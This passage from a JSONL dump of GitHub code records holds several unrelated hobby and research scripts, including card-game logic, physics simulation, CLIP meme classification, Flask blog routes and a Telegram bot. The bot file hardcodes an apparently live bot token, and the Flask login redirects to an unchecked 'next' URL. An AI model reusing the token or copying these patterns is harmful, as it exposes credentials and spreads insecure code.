current_straghit.add('_'.join(card_j_prop))\n card_i_prop = card_j_prop\n else:\n if joker_black == 1:\n if int(card_i_prop[0]) == int(card_j_prop[0])-2 and card_i_prop[2] == card_j_prop[2]:\n current_straghit.add(\"00_black_joker\")\n current_straghit.add('_'.join(card_i_prop))\n current_straghit.add('_'.join(card_j_prop))\n card_i_prop = card_j_prop\n if joker_red == 1:\n if int(card_i_prop[0]) == int(card_j_prop[0])-2 and card_i_prop[2] == card_j_prop[2]:\n current_straghit.add(\"00_red_joker\")\n current_straghit.add('_'.join(card_i_prop))\n current_straghit.add('_'.join(card_j_prop))\n card_i_prop = card_j_prop\n if joker_red == 1 and joker_black == 1:\n if int(card_i_prop[0]) == int(card_j_prop[0])-3 and card_i_prop[2] == card_j_prop[2]:\n current_straghit.add(\"00_red_joker\")\n current_straghit.add(\"00_black_joker\")\n current_straghit.add('_'.join(card_i_prop))\n current_straghit.add('_'.join(card_j_prop))\n card_i_prop = card_j_prop\n \n if len(current_straghit) == 2 and joker_red == 1:\n current_straghit.add(\"00_red_joker\")\n elif len(current_straghit) == 2 and joker_black == 1:\n current_straghit.add(\"00_black_joker\")\n if len(current_straghit) > 2 and len(current_straghit) > len(straight):\n straight = copy.copy(current_straghit)\n current_straghit.clear()\n return list(straight)\n\ndef check_for_pairs(player_hand):\n pair1 = set()\n pair2 = set()\n for i in range(len(player_hand)-1):\n if player_hand[i][:2] == player_hand[i+1][:2]:\n if len(pair1) == 0:\n pair1.add(player_hand[i])\n pair1.add(player_hand[i+1])\n elif player_hand[i] in pair1:\n pair1.add(player_hand[i+1])\n else:\n pair2.add(player_hand[i])\n pair2.add(player_hand[i+1])\n \n if get_sum(pair1) >= get_sum(pair2):\n return list(pair1)\n else:\n return list(pair2)\ndef sort_straghit(straghit:list):\n straghit.sort()\n print(straghit)\n ms = find_missing_cards_for_straghit(straghit)\n print(ms)\n if len(ms) == 1:\n if (straghit[0] == '00_red_joker' or straghit[0] == '00_black_joker') and straghit[1][:2] == \"01\":\n temp = straghit[2]\n straghit[2] = straghit[0]\n straghit[0] = temp\n temp = straghit[0]\n straghit[0] = straghit[1]\n straghit[1] = temp\n else:\n temp = straghit[1] \n straghit[1] = straghit[0]\n straghit[0] = temp\n elif len(ms) == 2:\n temp = straghit[2] \n straghit[2] = straghit[0]\n straghit[0] = temp\n\ndef find_missing_cards_for_straghit(straghit):\n card_list = list(straghit)\n card_list.sort()\n return_val = []\n for i in range(len(card_list)-1):\n if int(card_list[i][:2]) == 0:\n continue\n if int(card_list[i][:2]) == int(card_list[i+1][:2])-2:\n rank = int(card_list[i][:2])+1\n if rank < 10:\n return_val.append(\"0\"+str(rank)+ card_list[i][2::])\n else:\n return_val.append(str(rank)+ card_list[i][2::])\n\n if int(card_list[i][:2]) == int(card_list[i+1][:2])-3:\n rank = int(card_list[i][:2])+1\n if rank < 10:\n return_val.append(\"0\"+str(rank)+ card_list[i][2::])\n else:\n return_val.append(str(rank)+ card_list[i][2::])\n if rank < 9:\n return_val.append(\"0\"+str(rank+1)+ card_list[i][2::])\n elif rank < 13:\n return_val.append(str(rank+1)+ card_list[i][2::])\n if int(card_list[0][:2]) == 0 and int(card_list[1][:2]) == 1:\n rank = int(card_list[-1][:2])\n if rank < 9:\n return_val.append(\"0\"+str(rank+1)+ card_list[-1][2::])\n elif rank < 13:\n return_val.append(str(rank+1)+ card_list[-1][2::])\n elif int(card_list[0][:2]) == int(card_list[1][:2])-1 and int(card_list[0][:2]) != 0:\n rank = int(card_list[0][:2])\n if rank != 0:\n if rank < 11:\n return_val.append(\"0\"+str(rank-1)+ card_list[0][2::])\n else:\n return_val.append(str(rank-1)+ card_list[0][2::])\n if rank < 8:\n return_val.append(\"0\"+str(rank+2)+ card_list[0][2::])\n elif rank < 12:\n return_val.append(str(rank+2)+ card_list[0][2::])\n\n return return_val\n","repo_name":"arikost/YanivCardGame","sub_path":"flask-server/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":11549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14049709170","text":"#!/bin/bash\n\n''':'\ntest_path=test/\nfail_msg=\"*** validation failed\"\n\necho \"INFO: 'make clean' must work\"\nmake clean ; ret=$?\n\nif [ -n \"$(ls _layer*.so _utils*.so 2> /dev/null)\" ] ; then\n echo \"$fail_msg for uncleanness\"\n exit 1\nfi\n\necho \"INFO: 'make utils layer'' must work\"\nmake utils layer; ret=$?\nif [ 0 -ne $ret ] ; then echo \"$fail_msg\" ; exit $ret ; fi\n\necho \"INFO: validate using pytest\"\npython3 -m pytest $test_path/test_layer.py; ret=$?\nif [ 0 -ne $ret ] ; then echo \"$fail_msg\" ; exit $ret ; fi\n\nmake clean;\nexit 0\n':'''\n\nimport unittest\nimport os\n\nfrom _layer import Layer\n \ndef test_save_load():\n origin_layer = Layer(2, 2, \"linear\", False)\n origin_layer.test_save_layer(\"save_layer_test\")\n print(\"origin layer: {}\".format(origin_layer))\n\n new_layer = Layer()\n print(\"new layer: {}\".format(new_layer))\n new_layer.test_load_layer(\"save_layer_test\")\n print(\"loaded layer: {}\".format(new_layer))\n\n assert(origin_layer.__str__() == new_layer.__str__())\n\ntest_save_load()","repo_name":"hychiu02/AutoEncoder-for-arrhythmia-detection","sub_path":"test/test_layer.py","file_name":"test_layer.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15110249741","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\nimport tdse\n\ndt = 0.008\ndr = 0.02\nr_max = 120\nNr=r_max/dr\nNl=6\n\natom = tdse.atom.Ar\nsh_grid = tdse.grid.ShGrid(Nr=Nr, Nl=Nl, r_max=r_max)\nsp_grid = tdse.grid.SpGrid(Nr=Nr, Nc=33, Np=1, r_max=r_max)\nylm_cache = tdse.sphere_harmonics.YlmCache(Nl, sp_grid)\nuabs = tdse.abs_pot.UabsMultiHump(20*dr, r_max/8)\nuabs = tdse.abs_pot.UabsZero()\nws = tdse.workspace.SOrbsWorkspace(sh_grid, sp_grid, uabs, ylm_cache, Uh_lmax=1, Uxc_lmax=3)\norbs = tdse.orbitals.Orbitals(atom, sh_grid)\norbs.load('ar_r_120_lb.npy')\n#orbs.normalize()\n\nT = 2*np.pi / 5.7e-2\ntp = 20*T\n\nf = tdse.field.TwoColorSinField(\n E0=tdse.utils.I_to_E(2e14),\n alpha=0.0,\n tp=tp\n )\n\nr = np.linspace(dr,r_max,Nr)\n\nt = np.arange(0, tp, dt)\n\ndef data_gen():\n for i in range(t.size):\n #if i % 20 == 0:\n print(\"t = {}, E = {}\".format(t[i], f.E(t[i])))\n yield i\n ws.prop(orbs, atom, f, t[i], dt)\n\nfig = plt.figure()\nax = plt.subplot(121)\nax_n = plt.subplot(122)\n\nlines = []\nfor ie in range(atom.countOrbs):\n line, = ax.plot(r, np.abs(orbs.asarray()[0,0])**2, label=\"n = {}\".format(ie))\n lines.append(line)\n\nax.grid()\nax.set_ylim(1e-20, 1e3)\nax.set_yscale('log')\n\nn = np.zeros((t.size, atom.countOrbs))\naz = np.zeros(t.size)\nz = np.zeros(t.size)\norbs.norm_ne(n[0,:], True)\nprint(n[0,:])\n\nline_n, = ax_n.plot(t, az, label=\"az\")\nax_n.set_ylim(-1e-6, 1e-6)\nlines.append(line_n)\n\nline_az, = ax_n.plot(t[1:-1], np.diff(z,2)/dt**2, label=\"z\")\nlines.append(line_az)\n\ndef run(data):\n i = data\n\n arr = orbs.asarray()\n for ie in range(atom.countOrbs):\n lines[ie].set_ydata(np.sum(np.abs(arr[ie])**2, axis=0))\n\n orbs.norm_ne(n[i,:], True)\n az[i] = tdse.calc.az(orbs, atom, f, t[i])\n z[i] = orbs.z()\n print(\"az = \", az[i])\n line_n.set_ydata(az)\n line_az.set_ydata(np.diff(z,2)/dt**2)\n ax_n.set_xlim(0, t[i])\n ax_n.set_ylim(np.min(az[0:i+1]), np.max(az[0:i+1]))\n print(n[i,:])\n return lines,\n\nani = animation.FuncAnimation(fig, run, data_gen, blit=False, interval=1, repeat=False)\nplt.legend()\nplt.show()\n","repo_name":"vssanya/tddft","sub_path":"test/argon_prop.py","file_name":"argon_prop.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19465631426","text":"import os\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nimport torch\nimport clip\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom utils import load_data, find_first_smaller, evaluate, find_first_sum_smaller\n\n\ndef seed_everything(seed=11711):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n\nif __name__ == '__main__':\n seed_everything(44)\n\n # load pretrained model\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n model, preprocess = clip.load(\"ViT-B/32\", device=device)\n\n # test data preparation\n test_folder = '../data/test_set_task3/'\n data, classes = load_data(test_folder + 'test_set_task3.txt')\n classes = list(classes)\n\n length = len(data)\n pred_labels, gold_labels = {}, {}\n\n # set up the prompt method, 'no' and 'imply' are implemented here\n prompt_method = 'imply' # or 'no'\n\n # iterate each data point\n for i in range(length):\n print(f'processing {i + 1} / {length}')\n # process image\n image = preprocess(Image.open(test_folder + data[i]['image'])).unsqueeze(0).to(device)\n\n pred = []\n for j in range(len(classes)):\n # tokenize text\n if prompt_method == 'no':\n text = clip.tokenize([classes[j], 'no ' + classes[j]]).to(device)\n # ************ final results ************\n # Macro_F1: 0.14849517479516472\n # Micro_F1: 0.20749542961608777\n elif prompt_method == 'imply':\n text = clip.tokenize(['The Meme implies ' + classes[j], 'The Meme does not imply ' + classes[j]]).to(device)\n # ************ final results ************\n # Macro_F1: 0.18715687127161748\n # Micro_F1: 0.21447562776957166\n else:\n raise ValueError(f'{prompt_method} is not implemented. Please implement here')\n\n # make predictions\n with torch.no_grad():\n logits_per_image, logits_per_text = model(image, text)\n probs = logits_per_image.softmax(dim=-1).cpu().numpy()\n prob = list(probs[0])\n \n if prob[0] >= prob[1]:\n pred.append(classes[j])\n pred_labels[data[i]['id']] = pred\n gold_labels[data[i]['id']] = data[i]['labels']\n\n # calculate Macro_F1 and Micro_F1\n macro_f1, micro_f1 = evaluate(pred_labels, gold_labels, classes)\n print('************ final results ************')\n print('Macro_F1: ', macro_f1)\n print('Micro_F1: ', micro_f1)","repo_name":"xli2245/CS769_Project","sub_path":"clip_zero_shot/sgl_class_based_clip.py","file_name":"sgl_class_based_clip.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"31767324225","text":"import argparse\nimport os.path\nimport struct\nimport numpy as np\nfrom quadtree import Quadtree, RGB\nfrom PIL import Image\n\ndef is_valid_read_file(parser, arg):\n if not os.path.exists(arg):\n parser.error(\"The file %s does not exist!\" % arg)\n else:\n return arg\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('image',\n help='image file',\n type=lambda x: is_valid_read_file(parser, x))\nparser.add_argument('operation',\n help='operation to do on image',\n type=str)\n\nargs = parser.parse_args()\nimg_raw = Image.open(args.image)\nimg_rgb = img_raw.convert('RGB')\nwidth, height = img_rgb.size\nshape = (height, width)\ncolors = np.empty(shape,dtype=RGB)\npixels = img_rgb.load()\nfor h in range(height):\n for w in range(width):\n colors[h][w] = RGB(pixels[w,h])\nqtree = Quadtree(colors)\nmodified = qtree.outline()\n\n\n\n\n","repo_name":"ichang1/imageProcessing","sub_path":"python_ver/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72269619920","text":"# push, pop, size, empty, front, back\n# 모두 O(1)이 걸려야 함\n# 이중연결리스트로 구현한 queue를 써야 할 듯\n\nimport sys\n\nclass Node:\n\n def __init__(self, data):\n self.data = data\n self.prev = None\n self.next = None\n\nclass Queue:\n\n def __init__(self):\n self.nodeCount = 0\n self.head = Node(None)\n self.tail = Node(None)\n self.head.prev = None\n self.head.next = self.tail\n self.tail.prev = self.head\n self.tail.next = None\n\n def push(self, X):\n newNode = Node(X)\n if self.nodeCount == 0:\n self.head.next = newNode\n self.tail.prev = newNode\n self.nodeCount += 1\n \n else: # tail에서 들어가도록 바꿔야함.\n curr = self.tail.prev\n curr.next = newNode\n self.tail.prev = newNode\n newNode.next = self.tail\n newNode.prev = curr\n self.nodeCount += 1\n\n def pop(self):\n if self.nodeCount == 0:\n return -1\n\n else:\n curr = self.head.next\n self.head.next = curr.next\n curr.next.prev = self.head\n self.nodeCount -= 1\n return curr.data\n\n def size(self):\n return self.nodeCount\n\n def empty(self):\n if self.nodeCount == 0:\n return 1\n\n else:\n return 0\n\n def front(self):\n if self.nodeCount == 0:\n return -1\n\n else:\n return self.head.next.data\n\n def back(self):\n if self.nodeCount == 0:\n return -1\n\n else:\n return self.tail.prev.data\n\n\nif __name__==\"__main__\":\n n = int(sys.stdin.readline())\n queue = Queue()\n for i in range(n):\n command = sys.stdin.readline().split()\n\n if command[0]=='push':\n queue.push(int(command[1]))\n\n elif command[0]=='pop':\n result = queue.pop()\n sys.stdout.write(str(result)+'\\n')\n\n elif command[0]=='size':\n result = queue.size()\n sys.stdout.write(str(result)+'\\n')\n\n elif command[0]=='empty':\n result = queue.empty()\n sys.stdout.write(str(result)+'\\n')\n\n elif command[0]=='front':\n result = queue.front()\n sys.stdout.write(str(result)+'\\n')\n\n else:\n result = queue.back()\n sys.stdout.write(str(result)+'\\n')\n\n# 클래스로 구현해서 시간초과 뜨는 듯","repo_name":"haecheol-shin/algorithm_exercise","sub_path":"BOJ_DataStructure/BOJ_18258.py","file_name":"BOJ_18258.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30997672351","text":"import numpy as np\nimport cv2\n\nfrom utils.class_config import CHARACTER_CLASS\n\ndef order_points(pts):\n rect = np.zeros((4, 2), dtype = \"float32\")\n s = pts.sum(axis = 1)\n rect[0] = pts[np.argmin(s)]\n rect[2] = pts[np.argmax(s)]\n diff = np.diff(pts, axis = 1)\n rect[1] = pts[np.argmin(diff)]\n rect[3] = pts[np.argmax(diff)]\n return rect\n\ndef perspective_transform(img):\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n _, gray = cv2.threshold(gray_img, 150, 255, cv2.THRESH_BINARY )\n\n cont, _ = cv2.findContours(gray,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\n\n if cont == ():\n return img\n\n cont = sorted(cont, key= lambda cont:cv2.contourArea(cont), reverse = True)\n a = cont[0].reshape(cont[0].shape[0], cont[0].shape[2])\n\n rect = cv2.minAreaRect(a)\n\n\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n box = np.array(box)\n rect = order_points(box)\n\n (tl, tr, br, bl) = rect\n\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n\n dst = np.array([\n [0, 0],\n [maxWidth - 1, 0],\n [maxWidth - 1, maxHeight - 1],\n [0, maxHeight - 1]], dtype = \"float32\")\n # # compute the perspective transform matrix and then apply it\n M = cv2.getPerspectiveTransform(rect, dst)\n warped = cv2.warpPerspective(img, M, (maxWidth, maxHeight))\n\n if warped.shape[0] < 20:\n return img\n\n if warped.shape[1] < 20:\n return img\n return warped\n\ndef check_is_square_plate(boxes):\n return np.mean([box[-1] for box in boxes]) < 0.65\n\ndef sort_boxes_along_x(boxes):\n indice = np.argsort([box[0] for box in boxes]) \n return np.array(boxes)[indice]\n\ndef get_character(boxes):\n result = \"\"\n for box in boxes:\n result += CHARACTER_CLASS[int(box[-2])]\n\n return result\n\ndef get_value(boxes):\n if boxes == []:\n return \"Empty\"\n if check_is_square_plate(boxes):\n upper_character = []\n lower_character = []\n for box in boxes:\n if box[1] < 0.5:\n upper_character.append(box)\n else:\n lower_character.append(box)\n \n sorted_upper_character = sort_boxes_along_x(upper_character)\n sorted_lower_character = sort_boxes_along_x(lower_character)\n upper_string = get_character(sorted_upper_character)\n lower_string = get_character(sorted_lower_character)\n\n result_string = upper_string + \"-\" + lower_string\n\n else:\n sorted_character = sort_boxes_along_x(boxes)\n result_string = get_character(sorted_character)\n\n return result_string\n\ndef enhance_contrast(img):\n b_img, g_img, r_img = cv2.split(img)\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(32, 32))\n equalized_b_img = clahe.apply(b_img)\n equalized_g_img = clahe.apply(g_img)\n equalized_r_img = clahe.apply(r_img)\n\n return cv2.merge([equalized_b_img, equalized_g_img, equalized_r_img]),\\\n cv2.merge([cv2.equalizeHist(b_img), cv2.equalizeHist(g_img), cv2.equalizeHist(r_img)])","repo_name":"cuongtvee/Traffic_light","sub_path":"utils/license_plate_general.py","file_name":"license_plate_general.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"45067553262","text":"from Tasks.GetSleeperUsers import *\nfrom Tasks.GetNflPlayers import *\nfrom Tasks.GetUserRosters import *\nfrom Tasks.GetSleeperMatchup import *\nfrom Tasks.GetGameHistory import *\nfrom Models.fantasy_team_model import FantasyTeam\n\ndef GetSleeper(week):\n users = GetSleeperUserData()\n rosters = GetUserRosterData()\n players = GetNFLPlayersData()\n matchup_groups = GetSleeperMatchup(week)\n \n fantasy_teams = []\n roster_to_fantasy_team = {} # Create a dictionary to map roster_id to FantasyTeam\n for roster in rosters:\n owner = next(user for user in users if user.user_id == roster.owner_id)\n fantasy_team = FantasyTeam(owner, roster, players)\n fantasy_teams.append(fantasy_team)\n roster_to_fantasy_team[roster.roster_id] = fantasy_team # Add the mapping to the dictionary\n\n # Create a dictionary that maps the usernames to the historical names\n historical_names = {\n \"phutt02\": \"Pete\",\n \"sasqooch\": \"Martin\",\n \"Conman1719\": \"Conman\",\n \"bbrown812\": \"Brendan\",\n \"AlexKonrardy97\": \"Ralph\",\n \"yocool7890\": \"Bill\",\n \"erikstacy\": \"Erik\",\n \"BigMikeDuzIt\": \"Diesel\",\n \"JoHyphenE\": \"Joey\",\n \"KurtTruk\": \"Kurt\",\n \"Tfugz\": \"Troy\",\n \"nbeutin17\": \"Nate\",\n }\n \n returnString = \"\"\n for matchup_group in matchup_groups:\n fantasy_team_1 = roster_to_fantasy_team[matchup_group[0].roster_id]\n fantasy_team_2 = roster_to_fantasy_team[matchup_group[1].roster_id]\n # Look up the historical names from the dictionary and print them\n historical_name_1 = historical_names.get(fantasy_team_1.user.display_name, fantasy_team_1.user.display_name)\n historical_name_2 = historical_names.get(fantasy_team_2.user.display_name, fantasy_team_2.user.display_name)\n\n historical_matchups = GetMatchupHistory(historical_name_1, historical_name_2)\n historical_matchups = sorted(historical_matchups, key=lambda matchup: matchup.Year, reverse=True)\n\n returnString += f\"{historical_name_1} ({fantasy_team_1.user.team_name}) vs. {historical_name_2} ({fantasy_team_2.user.team_name})\\n\"\n \n for matchup in historical_matchups:\n returnString += f\"In {matchup.Year} week {matchup.Week}, {matchup.Winner} won {matchup.Team1Score if matchup.Team1Score > matchup.Team2Score else matchup.Team2Score} to {matchup.Team1Score if matchup.Team1Score < matchup.Team2Score else matchup.Team2Score}{' in a PTGOTW' if matchup.WasPTGOTW == True else ''}\\n\"\n returnString += \"\\n\"\n return returnString","repo_name":"brendanbrown812/BTBPythonScript","sub_path":"Tasks/GetSleeper.py","file_name":"GetSleeper.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22668108782","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nfrom pyspark.sql import SparkSession\n\nspark = SparkSession. \\\n builder. \\\n appName(\"WebAalyticsApp\"). \\\n config(\"spark.ui.port\", \"0\"). \\\n getOrCreate()\n\nclicks_df = spark. \\\n read. \\\n parquet(\"/Users/akashpatel/Documents/Clairvoyant/dummy/data/\")\n\nclicks_df.show(truncate=False)\n\nfrom pyspark.sql.functions import col, get_json_object\n\nclicks_df = clicks_df. \\\n withColumn(\"x\", get_json_object(col(\"value\"), \"$.x\").cast(\"long\")). \\\n withColumn(\"y\", get_json_object(col(\"value\"), \"$.y\").cast(\"long\")). \\\n drop(\"value\")\n\nclicks_df.printSchema()\n\npandas_df = clicks_df.toPandas()\n\nimport plotly.express as px\n\nfig = px.scatter( x=pandas_df[\"x\"], y=pandas_df[\"y\"])\n\nfig.update_yaxes(autorange=\"reversed\")\n\nfrom PIL import Image\nimg = Image.open('/Users/akashpatel/Documents/Clairvoyant/ClickStreamWebAnalyticsConsumer/visualization/nice.png')\n\nfig.add_layout_image(\n dict(\n source=img,\n xref=\"x\",\n yref=\"y\",\n x=0,\n y=8,\n sizex=1680,\n sizey=713.94,\n sizing=\"stretch\",\n opacity=0.6,\n layer=\"below\"))\n\n\nfig.update_layout(template=\"plotly_white\")\n\nfig.show()\n\nspark.stop()","repo_name":"Akashpatel579/ClickStreamWebAnalyticsConsumer","sub_path":"visualization/click_events_viz.py","file_name":"click_events_viz.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2965437812","text":"import os\nimport secrets\nfrom PIL import Image\nfrom flask import render_template, url_for, flash, redirect, request\nfrom flaskblog import app, db, bcrypt\nfrom flaskblog.forms import RegistrationForm, LoginForm, UpdateAccountForm\nfrom flaskblog.models import User,Post\nfrom flask_login import login_user, current_user, logout_user, login_required\n\nposts = [\n {\n 'author': 'Chrissy Em',\n 'title': 'Blog Post 2',\n 'content': 'Some content',\n 'date_posted': 'July 1, 2020'\n },\n {\n 'author': 'Chris Em',\n 'title': 'Blog Post 1',\n 'content': 'Some content 1',\n 'date_posted': 'July 10, 2020'\n }\n]\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('home.html', posts=posts)\n\n@app.route('/about')\ndef about():\n return render_template('about.html', name='Christine')\n#add methods when collecting data!\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user .is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n #Generate protected password from the data passed into the password field. Do this in strings instead of bytes\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n #create new instance of user for each registration. Do now pass in the original password they registered with, instead use the hased version\n user = User(username=form.username.data, email=form.email.data, password=hashed_password)\n db.session.add(user)\n db.session.commit()\n #To run the server in test mode, call import the db from flaskblog and then run db.create_all()\n flash('Account created! Go ahead and login to get started!', 'success')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user .is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n next_page = request.args.get('next')\n return redirect(next_page) if next_page else redirect(url_for('home'))\n else:\n flash('Login Unsuccessful. Please check email and password', 'danger')\n return render_template('login.html', title='Login', form=form)\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n#Change name of file uploaded so that it does not clas with a pre-existing file. \n#Use secrets module to randomize image name\n#Use os models to store image type, as image type that was added\ndef save_picture(form_picture):\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(form_picture.filename)\n picture_FN = random_hex + f_ext\n #store path that image is found in. app.root_path gives full path up to package directory\n picture_path = os.path.join(app.root_path, 'static/profile_pics', picture_FN)\n #resize image before saving (from Pillow module)\n output_size = (125, 125)\n i = Image.open(form_picture)\n i.thumbnail(output_size)\n #saves image\n i.save(picture_path)\n prev_picture = os.path.join(app.root_path, 'static/profile_pics', current_user.image_file)\n if os.path.exists(prev_picture) and os.path.basename(prev_picture) != 'default.jpg':\n os.remove(prev_picture)\n return picture_FN\n\n@app.route('/account', methods=['GET', 'POST'])\n@login_required\ndef account():\n form = UpdateAccountForm()\n if form.validate_on_submit():\n #to save profile picture for user. Use a function to set user's profile picture\n if form.picture.data:\n picture_file = save_picture(form.picture.data)\n current_user.image_file = picture_file\n current_user.username = form.username.data\n current_user.email = form.email.data\n db.session.commit()\n flash('your account has been updated', 'success')\n #pay attention to post, get redirect to avoid 'are you sure you want to reload?\" message\n #sends another get request to automatically refresh the page\n #populates form with updated information when you go to the account page\n return redirect(url_for('account'))\n elif request.method == 'GET':\n form.username.data = current_user.username\n form.email.data = current_user.email\n image_file = url_for('static', filename='profile_pics/' + current_user.image_file)\n return render_template('account.html', title='Account', image_file=image_file, form=form)\n","repo_name":"Christinekrm02/Blog-App","sub_path":"flaskblog/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24726405253","text":"# this code should be run inside the dataset folder and up the audios folder\r\n# the spectrum will be saved in NEW_DIR in npy format\r\n# check the NEW_DIR and OLD_DIR to ensure you have put it in the write directory\r\n\r\nimport wave\r\nimport os\r\nimport librosa\r\nimport librosa.display\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport cv2\r\n\r\nNEW_DIR = './video_3frames'\r\nOLD_DIR = './videos/solo' \r\nBLOCK_TIME = 66302/11000\r\nSAMPLE_RATE = 11000\r\nFPS = 24\r\nBLOCK_LENGTH = math.floor(BLOCK_TIME*FPS)\r\nFRAME_INDEX = [0,math.floor((BLOCK_LENGTH-1)/2),BLOCK_LENGTH-1]\r\n\r\nfrequencies = np.linspace(SAMPLE_RATE/2/512,SAMPLE_RATE/2,512)\r\nlog_freq = np.log10(frequencies)\r\nsample_freq = np.linspace(log_freq[0],log_freq[-1],256)\r\nsample_index = [np.abs(log_freq-x).argmin() for x in sample_freq]\r\n# prepare for log resample\r\n\r\nif os.path.exists(NEW_DIR) == False:\r\n\tos.mkdir(NEW_DIR)\r\n\r\ninstrument_class = os.listdir(OLD_DIR)\r\nfor instrument in instrument_class:\r\n\tif os.path.exists(os.path.join(NEW_DIR,instrument)) == False:\r\n\t\tos.mkdir(os.path.join(NEW_DIR,instrument))\r\n\tfiles_dir = os.path.join(OLD_DIR,instrument)\r\n\tfiles = os.listdir(files_dir)\r\n\tfor file in files:\r\n\t\tcap = cv2.VideoCapture(os.path.join(files_dir,file))\r\n\t\tframeCount = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\r\n\t\tframeWidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n\t\tframeHeight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\t\tblock_num = math.floor(frameCount/BLOCK_LENGTH)\r\n\t\torder = file[:-4]\r\n\t\tdestnation = os.path.join(NEW_DIR,instrument,order)\r\n\t\tbuf = np.empty((frameCount, frameHeight, frameWidth, 3), np.dtype('uint8'))\r\n\t\tfc = 0\r\n\t\tret = True\r\n\t\twhile (fc < frameCount and ret):\r\n\t\t\tret, buf[fc] = cap.read()\r\n\t\t\tfc += 1\r\n\t\tcap.release()\r\n\t\tif os.path.exists(destnation) == False:\r\n\t\t\tos.mkdir(destnation)\r\n\t\tfor i in range(block_num):\r\n\t\t\ttemp = buf[i*BLOCK_LENGTH:(i+1)*BLOCK_LENGTH,:,:,:]\r\n\t\t\tresult = temp[FRAME_INDEX,:,:,:]\r\n\t\t\tfinal = np.empty((len(FRAME_INDEX),224,224,3),np.dtype('uint8'))\r\n\t\t\tfor p in range(0,len(FRAME_INDEX)):\r\n\t\t\t\tfinal[p,:,:,:]=cv2.resize(result[p,:,:,:],(224,224))\r\n\t\t\tnp.save(os.path.join(destnation,str(i)),final)\r\n\t\t\t#exit()\r\n\r\n\t\t\t# save the wave segment\r\n\t\t\t#librosa.output.write_wav(os.path.join(destnation,str(i)+'.wav'),data,sr) \r\n","repo_name":"IrisLi17/Sound_of_Pixels","sub_path":"util/video_pretreat.py","file_name":"video_pretreat.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"72616202961","text":"import json\nimport requests\nfrom telegram import *\nfrom telegram.ext import *\nfrom datetime import datetime\nfrom itertools import islice\n\n\n# Telegram bot token\ntoken='5409758372:AAGCPq3_S0oCLIwS8oCVME5DBJ7ThZCIH68'\n# bot = Bot(token)\n\ndef sample_responses(input_text):\n address = str(input_text).lower()\n print(details(address))\n return details(address)\n\ndef start_command(update, context):\n update.message.reply_text('Type in your wallet address to get started!')\n\ndef help_command(update, context):\n help_text = \"This bot sends you the recent 10 BSC tokens received in your wallet\"\n update.message.reply_text(help_text)\n\n\ndef handle_message(update, context):\n text = str(update.message.text).lower()\n response = sample_responses(text)\n 